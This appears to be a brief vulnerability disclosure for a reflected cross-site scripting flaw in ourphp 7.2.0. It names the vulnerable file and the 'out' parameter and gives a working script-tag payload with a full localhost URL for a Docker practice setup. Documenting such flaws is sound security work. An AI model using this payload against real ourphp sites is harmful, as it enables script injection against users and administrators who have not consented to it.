Vendor | Product | Version |
---|---|---|
ourphp | ourphp | 7.2.0 |
To install OURPHP <= 7.2.0 in docker you can use guide to install docker for practice purpose.
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting).
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out."
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
# </script><script>alert(`xss`)</script>